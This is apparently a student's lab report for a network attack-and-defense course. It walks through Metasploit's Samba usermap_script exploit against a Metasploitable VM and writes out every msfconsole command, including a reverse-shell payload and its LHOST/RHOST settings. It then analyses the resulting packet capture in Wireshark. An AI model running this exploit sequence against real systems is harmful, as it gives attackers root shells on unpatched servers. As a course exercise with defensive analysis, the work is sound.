20242935 2024-2025-2 《网络攻防实践》第七周作业

20242935 2024-2025-2 《网络攻防实践》第七周作业

实践七 Linux操作系统攻防

一、实践要求

实践内容：

（1）使用Metasploit进行Linux远程渗透攻击

任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：

①启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；

②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；

③选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；

④设置渗透攻击参数（RHOST，LHOST，TARGET等）；

⑤执行渗透攻击；

⑥查看是否正确得到远程Shell，并查看获得的权限。

（2）实践作业：攻防对抗实践

攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。

防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

二、实验过程

任务一：使用Metasploit进行Linux远程渗透攻击

虚拟机	IP地址
Kali-Linux（攻击机）	192.168.200.6
Metasploitable_ubuntu（靶机）	192.168.200.5

在kali攻击机上输入指令打开metasploit软件

msfconsole

输入指令查找渗透攻击模块是否存在

search /multi/samba/usermap_script

输入指令使用渗透攻击模块

use exploit/multi/samba/usermap_script

输入指令会显示此漏洞的载荷

show payloads

选择攻击PAYLOAD为远程shell，输入指令来设置有效的攻击载荷，反向连接

set payload cmd/unix/reverse

有两个IP地址参数需要设置，分别是LHOST(本地ip地址：kali攻击机)和RHOSTS(目标ip地址：靶机Metasploitable_ubuntu)

set LHOST 192.168.200.6

set RHOST 192.168.200.5

输入指令查看信息设置

show options

输入指令开始渗透攻击

exploit

成功拿到靶机权限

通过 whoami 查询，发现我们已经获得了root权限，这表明提权成功

任务二：攻防对抗实践

攻方攻击过程：任务一已给出

对攻击过程进行的Wireshark抓包内容进行分析

可以知道攻击者IP为192.168.200.6，目标IP为192.168.200.5，目标端口号为60356

攻击机kali（192.168.200.6）向靶机（192.168.200.5）发起的TCP连接请求

攻击者在 Kali 上运行了带反向 shell 的 Metasploit Payload，连接目标主机的 4444 端口（用于 shell 通信）

192.168.200.6 > 192.168.200.5 TCP 4444 > 59055 [PSH, ACK]

192.168.200.5 > 192.168.200.6 TCP 59055 > 4444 [ACK]

靶机响应连接（ACK）

192.168.200.5 > 192.168.200.6 TCP 59056 > 4444 [PSH, ACK]

表明攻击载荷生效，shell 建立，正在传送命令或结果

攻击者继续传输（ACK）

靶机继续返回数据

查看到SMB数据包中的shellcode，nohup是no hang up的缩写，意思是不挂断，用nohup运行命令可以使命令永久的执行下去

三、学习中遇到的问题及解决

无

四、学习感想和体会

通过Wireshark筛选关键端口数据包、跟踪TCP连接流，成功还原了攻击全过程，识别出攻击者IP、目标端口、Payload传输和Shellcode的注入等核心信息。尤其是在抓包中看到nohup命令作为shellcode的一部分时，进一步理解了如何通过反向Shell在目标机上持久运行命令。